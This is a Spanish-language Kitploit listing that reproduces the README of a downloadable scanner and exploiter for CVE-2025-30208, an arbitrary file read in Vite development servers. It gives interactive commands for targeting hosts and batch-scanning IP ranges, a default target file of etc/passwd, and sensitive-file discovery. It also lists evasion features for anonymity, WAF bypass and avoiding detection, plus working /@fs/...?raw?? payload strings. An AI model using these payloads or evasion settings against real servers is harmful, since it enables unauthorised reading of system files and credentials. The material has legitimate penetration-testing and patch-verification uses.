Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 es una vulnerabilidad de lectura arbitraria de archivos de severidad media en el servidor de desarrollo de Vite (una popular herramienta de compilación frontend) | Kitploit
Herramientas/GitHubGitHub/th-secforge/cve-2025-30208
ReconocimientoEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubth-secforge/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 es una vulnerabilidad de lectura arbitraria de archivos de severidad media en el servidor de desarrollo de Vite (una popular herramienta de compilación frontend)

Ver Repositorio
143hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔥 Escáner de vulnerabilidad CVE-2025-30208 de lectura arbitraria de archivos en Vite

Python License Security Status Modular

Escáner de vulnerabilidades avanzado para CVE-2025-30208 con funciones de nivel empresarial

Herramienta profesional de pruebas de penetración para la detección de la vulnerabilidad de lectura arbitraria de archivos en Vite

🚀 Inicio Rápido • 📋 Características • 🔧 Uso • 📊 Ejemplos • 🛡️ Seguridad


📖 Resumen

Este es un escáner de vulnerabilidades integral diseñado para detectar y explotar la vulnerabilidad CVE-2025-30208 en los servidores de desarrollo de Vite. La vulnerabilidad permite el acceso de lectura arbitraria de archivos a través de los endpoints del sistema de archivos de Vite, lo que potencialmente expone archivos de configuración sensibles, código fuente e información del sistema.

🎯 Qué Hace Esta Herramienta

  • Detecta instancias vulnerables de Vite en redes
  • Explota la vulnerabilidad de lectura arbitraria de archivos de forma segura
  • Descubre archivos sensibles y datos de configuración
  • Informa de los hallazgos en múltiples formatos (HTML, JSON, Consola)
  • Gestiona sesiones de escaneo y configuraciones
  • Maneja los errores de forma elegante con mecanismos de reintento automático

🏗️ Arquitectura Modular

La herramienta ahora cuenta con una arquitectura modular para una mejor mantenibilidad y extensibilidad:

  • CVE-2025-30208.py - Aplicación principal del escáner
  • payloads.py - Payloads de explotación avanzados (más de 60 variaciones)
  • sensitive_files.py - Base de datos integral de archivos sensibles (más de 200 archivos)
  • html_template.py - Plantilla de informes HTML mejorada con estilo hacker

🚀 Inicio Rápido

Requisitos Previos

pip3 install -r requirements.txt

Uso Básico

python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Características

🔍 Detección principal de vulnerabilidades

  • Más de 60 payloads avanzados: Técnicas de explotación integrales para una detección máxima
  • Detección inteligente: Análisis inteligente de respuestas para evitar falsos positivos
  • Validación en tiempo real: Validación continua de las respuestas del objetivo
  • Pruebas integrales: Prueba todos los endpoints vulnerables conocidos

🛡️ Funciones de seguridad mejoradas

  • Soporte de proxy: Configuración de proxy HTTP/HTTPS para anonimato
  • Cabeceras personalizadas: Evita WAF/IPS con cabeceras HTTP personalizadas
  • Límite de velocidad: Retardos configurables para evitar la detección
  • Gestión de sesiones: Guardar y restaurar sesiones de escaneo
  • Validación de entrada: Validación integral de parámetros

🔧 Capacidades avanzadas

  • Escaneo por lotes: Escaneo multihilo de múltiples objetivos
  • Descubrimiento de archivos sensibles: Descubrimiento automatizado de más de 200 archivos sensibles
  • Pruebas de conectividad: Pruebas de protocolo TCP/UDP/HTTP/HTTPS
  • Recuperación de errores: Reintento automático con retroceso exponencial
  • Registro integral: Registros detallados con marcas de tiempo

📊 Informes y salida

  • 🎨 Informes HTML mejorados: Informes de vulnerabilidad con estilo hacker y animaciones
  • Exportación JSON: Datos estructurados para análisis posterior
  • Salida por consola: Retroalimentación en tiempo real con códigos de color
  • Archivos de registro: Trazas de auditoría detalladas
  • Interfaz web interactiva: Servidor web integrado para visualizar informes

🔧 Guía de Uso

1. Configuración básica

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Prueba de vulnerabilidad

CVE-2025-30208 > run

# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Escaneo por lotes

CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]

4. Descubrimiento de archivos sensibles

CVE-2025-30208 > scan

5. Configuración avanzada

# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. Informes HTML mejorados

# Generate beautiful HTML report
CVE-2025-30208 > pull

# Start web server to view report
CVE-2025-30208 > web

# Start web server on specific port
CVE-2025-30208 > web 8081

# Stop web server
CVE-2025-30208 > web off

📊 Referencia de comandos

ComandoDescripciónEjemplo
set <option> <value>Establecer opciones de configuraciónset RHOST 192.168.1.100
show optionsMostrar la configuración actualshow options
editEditor interactivo de opcionesedit
run / exploitEjecutar la prueba de vulnerabilidadrun
batchEscaneo por lotes de múltiples objetivosbatch
scanDescubrir archivos sensiblesscan
pullExportar resultados a HTML/JSONpull
web [on|off|port]Servidor web para informes HTMLweb 8080
saveGuardar la configuración de la sesiónsave
loadCargar la configuración de la sesiónload
testProbar la conectividad con el objetivotest
validateValidar la configuración actualvalidate
verboseAlternar el modo verboseverbose
proxyConfigurar los ajustes de proxyproxy
headersEstablecer cabeceras HTTP personalizadasheaders
rateConfigurar el límite de velocidadrate
logMostrar información de registrolog
help / ?Mostrar ayudahelp
exit / quitSalir de la herramientaexit

⚙️ Opciones de configuración

OpciónDescripciónValor por defectoValidación
RHOSTDirección IP/host del objetivo-Validación de hostname/IP
RPORTNúmero de puerto del objetivo-Rango de puertos (1-65535)
FILEPATHRuta de archivo a probaretc/passwdValidación de ruta
PROXYURL de proxy HTTP/HTTPS-Validación de formato URL
VERBOSEHabilitar salida detalladafalseValidación booleana
RATE_LIMITRetardo entre peticiones (segundos)0.3Validación numérica
THREADSNúmero de hilos para el escaneo por lotes5Validación de entero
TIMEOUTTiempo de espera de petición (segundos)5Validación de entero
CUSTOM_HEADERSCabeceras HTTP personalizadas (JSON){}Validación de formato JSON

🎨 Sistema de payloads mejorado

El escáner ahora utiliza más de 60 variaciones de payload organizadas en payloads.py:

Payloads @fs principales

/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

Variaciones de parámetros extendidas

/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
Descargar herramienta